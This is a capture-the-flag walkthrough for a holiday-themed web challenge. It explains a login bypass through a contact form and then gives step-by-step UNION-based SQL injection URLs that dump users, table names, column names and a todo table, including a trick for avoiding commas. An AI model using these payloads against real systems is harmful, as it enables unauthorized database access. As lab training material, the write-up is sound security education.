12) Frost Tower Website Checkup

Obj

Details

  • Location: FrostFest/Jack's Studio
  • Troll: Ingreta Tude
  • Objective Link 1: Link
  • Objective Link 2: Link
  • github files: Link

Obj

Troll's Objective Message

Hey there! I’m Ingreta Tude.

I really don’t like the direction Jack Frost is leading us. He seems obsessed with beating Santa and taking over the holiday season. It just doesn’t seem right. Why can’t we work together with Santa and the elves instead of trying to beat them? But, I do have an Objective for you. We’re getting ready to launch a new website for Frost Tower, and the big guy has charged me with making sure it’s secure. My sister, Ruby Cyster, created this site, and I don’t trust the results. Can you please take a look at it to find flaws? Here is the source code if you need it. Oh wow - I thought we left SQL injection in the last decade. Thanks for your help finding this!

The terminal challenge for this objective is the terminal "Elf Code Python" offered by Ribb Bonbowford. Solving this terminal challenge provides additional hints for this objective. To view the hints use the menu on the left.

To start this objective click on the "Frost Tower Website Checkup" terminal next to Ingreta Tude. This will open up this website.

After openning the above website, open the Firefox developer tools and go to the Network tab.

On the website, type in a random email address in the subscribe field and press submit. The Developers tool shows the HTTP header for this request:

Obj

The response is coming from the site https://staging.jackfrosttower.com/testsite.

By reviewing the source code for Frost Tower Website you can find login bypass and SQL injection (SQLi) vulnerablities.

The vulnerabilty for the login bypass can be found in the /postcontact endpoint:

Obj

To verify authentication, the website endpoints check for a session.unqiueID. The /postcontact endpoint (or contact form) sets the session.uniqueID if an email address was already submitted.

To bypass the authentication you need to submit the same email address twice in the contact form.

Open the above website in Firefox, https://staging.jackfrosttower.com/testsite.

Click the contact link on top right.

Enter and save the same email address twice to bypass the login.

Click on the dashboard to view the dashboard.

The SQL injection vulnerability is found in the /detail/:id endpoint.

Obj

The 'm.raw' command is preventing the .escape() function from working properly. You can take advantage of the SQLi vulnerabilty by requesting details for multiple contacts (ex. https://staging.jackfrosttower.com/detail/199,200,201). Now instead of the multiple contact IDs (199,200,201), we will be sending a SQLi. The SQLi URL looks as follow:

To get a list of all users by SQLi, visit the following website:

SQLi to get all users

https://staging.jackfrosttower.com/detail/199%20union select * from users --,

We can't send comma's in the SQLi request. To find all the table names you will need to replace the commas with a longer expression.

Run the following SQLi to get all the table names:

SQLi to get all the table names

https://staging.jackfrosttower.com/detail/199%20union select * from ((select 9999)A join (select table_name from information_schema.tables)B join (select null)C join (select null)D join (select null)E join (select null)F join (select null)G) --,

From the results of the above SQLi you see there is a table called todo.

Run the following SQLi three times with offset 0,1,2 to get the three column IDs:

SQLi to get column names for todo table

https://staging.jackfrosttower.com/detail/199%20union select * from ((select 9999)A join (SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'todo' ORDER BY ordinal_position LIMIT 1 offset 2)B join (select null)C join (select null)D join (select null)E join (select null)F join (select null)G) --,

From the results of the above SQLi you see the table todo has three columns id, note, completed.

Run the following SQLi to get the todo table:

SQLi to get the three columns of todo table

https://staging.jackfrosttower.com/detail/199%20union select * from ((select% 9999)A join (SELECT note FROM todo)B join (select completed from todo)C join (select id from todo)D join (select null)E join (select null)F join (select null)G) --,

From the results of the above SQLi you see one of the notes that says:

    With Santa defeated, offer the old man a job as a clerk in the Frost Tower Gift Shop so we can keep an eye on him

Answer

clerk